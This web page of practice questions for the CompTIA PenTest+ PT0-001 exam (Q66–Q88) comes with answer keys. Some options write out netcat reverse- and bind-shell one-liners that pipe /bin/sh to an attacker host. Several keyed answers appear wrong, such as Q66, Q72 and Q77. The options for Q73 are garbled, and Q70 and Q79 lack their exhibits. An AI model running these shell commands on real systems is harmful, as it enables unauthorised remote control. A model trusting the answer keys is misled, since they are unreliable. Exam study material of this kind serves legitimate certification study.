[Oct-2021] Practice CompTIA PT0-001 exam. Online Exam Practice Tests with detailed explanations! Pass PT0-001 with confidence! [Q66-Q88]


PT0-001 - CompTIA PenTest+ Certification Exam Practice Tests 2021 | UpdateDumps

NEW QUESTION 66
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO)

  • A. nc 192.168.1.5 44444
  • B. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f
  • C. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
  • D. nc -e /bin/sh 192.168.1.5 4444
  • E. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f
  • F. nc -nlvp 4444 -e /bin/sh

Answer: D,E

 

NEW QUESTION 67
A penetration tester has compromised a system and wishes to connect to a port on it from the attacking machine to control the system. Which of the following commands should the tester run on the compromised system?

  • A. nc 127.0.0.1 4423 -e /bin/bash
  • B. nc localhost 4423
  • C. nc -nvlp 4423 -e /bin/bash
  • D. nc 10.0.0.1 4423

Answer: C

 

NEW QUESTION 68
Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

  • A. run autoroute -a 192.168.1.0/24
  • B. set rhost 192.168.1.10
  • C. db_nmap -iL /tmp/privatehosts.txt
  • D. use auxiliary/server/socks4a

Answer: A

 

NEW QUESTION 69
Click the exhibit button.

Given the Nikto vulnerability scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Select TWO)

  • A. Cross-site request forgery
  • B. Arbitrary code execution
  • C. Session hijacking
  • D. SQL injection
  • E. Login credential brute-forcing

Answer: A,D

 

NEW QUESTION 70
Instructions:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the reset all button.
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

Answer:

 

NEW QUESTION 71
A security consultant found a SCADA device in one of the VLANs in scope. Which of the following actions would BEST create a potentially destructive outcome against the device?

  • A. Launch a DNS cache poisoning attack against the device.
  • B. Launch a Nessus vulnerability scan against the device.
  • C. Launch an SMB exploit against the device.
  • D. Launch an SNMP password brute force attack against the device.

Answer: D

 

NEW QUESTION 72
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

  • A. Stack base pointer
  • B. Destination index register
  • C. Stack pointer register
  • D. Index pointer register

Answer: C

 

NEW QUESTION 73
A penetration tester is performing a remote internal penetration test by connecting to the testing system from the Internet via a reverse SSH tunnel. The testing system has been placed on a general user subnet with an IP address of 192.168.1.13 and a gateway of 192.168.1.1. Immediately after running the command below, the penetration tester's SSH connection to the testing platform drops:

# sudo ettercap -Tq -w output.cap -M ARP /192.168.1.0/ /192.168.1.255/

Which of the following ettercap commands should the penetration tester use in the future to perform ARP spoofing while maintaining a reliable connection?

  • A. # ettercap -Tq -w output.cap -M ARP 00:00:00:00:00:00//80
  • B. # proxychains ettercap -Tq -w output.cap -M ARP /192.168.1.13/ /192.168.1.1/
  • C. FF:FF:FF:FF:FF:FF//80
    # ettercap --safe-mode -Tq -w output.cap -M ARP /192.168.1.2-
  • D. 255/ /192.168.1.1/
  • E. 255/ /192.168.1.13/
    # ettercap -Tq -w output.cap -M ARP /192.168.1.2-12;192.168.1.14-

Answer: B

 

NEW QUESTION 74
After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to remediate the use of common dictionary terms?

  • A. Disable the accounts after five incorrect attempts
  • B. Configure password filters
  • C. Expand the password length from seven to 14 characters
  • D. Decrease the password expiration window
  • E. Implement password history restrictions

Answer: C

 

NEW QUESTION 75
A penetration tester is testing a web application and is logged in as a lower-privileged user. The tester runs arbitrary JavaScript within an application, which sends an XMLHttpRequest, resulting in exploiting features to which only an administrator should have access.
Which of the following controls would BEST mitigate the vulnerability?

  • A. Add client-side security controls
  • B. Prevent directory traversal.
  • C. Sanitize all the user input.
  • D. Implement authorization checks.

Answer: D

 

NEW QUESTION 76
A security consultant is trying to attack a device with a previously identified user account.

Which of the following types of attacks is being executed?

  • A. Reverse shell attack
  • B. Credential dump attack
  • C. DLL injection attack
  • D. Pass the hash attack

Answer: D

 

NEW QUESTION 77
The following command is run on a Linux file system:
chmod 4111 /usr/bin/sudo
Which of the following issues may be exploited now?

  • A. Kernel vulnerabilities
  • B. Misconfigured sudo
  • C. Sticky bits
  • D. Unquoted service path

Answer: C

 

NEW QUESTION 78
A penetration tester is designing a phishing campaign and wants to build a list of users for the target organization. Which of the following techniques would be the MOST appropriate? (Select TWO)

  • A. Query an Internet WHOIS database.
  • B. Socially engineer the corporate call center.
  • C. Search posted job listings.
  • D. Scrape the company website.
  • E. Harvest users from social networking sites.

Answer: A,C

 

NEW QUESTION 79
Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented. Each password may be used only once.

Answer:

Explanation:
1.) Zverlory
2.) Zverl0ry
3.) zv3rl0ry
4.) Zv3r!0ry

 

NEW QUESTION 80
A penetration tester is performing a black-box test of a client web application, and the scan host is unable to access it. The client has sent screenshots showing the system is functioning correctly. Which of the following is MOST likely the issue?

  • A. An IPS/WAF whitelist is in place to protect the environment.
  • B. The penetration tester needs an OAuth bearer token.
  • C. The tester has provided an incorrect password for the application.
  • D. The penetration tester was not provided with a WSDL file.

Answer: B

 

NEW QUESTION 81
At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computer names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?

  • A. Enumeration of services
  • B. OSINT gathering
  • C. Port scanning
  • D. Social engineering

Answer: B

 

NEW QUESTION 82
A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?

  • A. Hacktivist
  • B. Script kiddie
  • C. Advanced persistent threat
  • D. Organized crime

Answer: D

 

NEW QUESTION 83
A penetration tester ran the following Nmap scan on a computer:
nmap -sV 192.168.1.5
The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH. Which of the following is the BEST explanation for what happened?

  • A. Nmap results contain a false positive for port 23.
  • B. The organization failed to disable Telnet.
  • C. Port 22 was filtered.
  • D. The service is running on a non-standard port.

Answer: B

 

NEW QUESTION 84
A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?

  • A. Nikto
  • B. W3AF
  • C. Swagger
  • D. WAR

Answer: C

Explanation:
Explanation/Reference: https://blog.securelayer7.net/api-penetration-testing-with-owasp-2017-test-cases/

 

NEW QUESTION 85
A penetration tester successfully exploits a DMZ server that appears to be listening on an outbound port. The penetration tester wishes to forward that traffic back to a device. Which of the following are the BEST tools to use for this purpose? (Select TWO)

  • A. Wireshark
  • B. Nmap
  • C. SSH
  • D. Cain and Abel
  • E. Tcpdump
  • F. Netcat

Answer: C,F

 

NEW QUESTION 86
The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test. Which of the following are the MOST likely causes for this difference? (Select TWO)

  • A. Limited network access
  • B. Misconfigured DHCP server
  • C. Network access controls
  • D. Incorrect credentials
  • E. Storage access

Answer: A,E

 

NEW QUESTION 87
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.6. Which of the following commands will test if the VPN is available?

  • A. nc 100.170.60.5 8080 /bin/sh
  • B. ike-scan -A -t 1 --sourceip=spoof_ip 100.170.60.5
  • C. fpipe.exe -l 8080 -r 80 100.170.60.5
  • D. nmap -sS -A -f 100.170.60.5

Answer: B

 

NEW QUESTION 88
......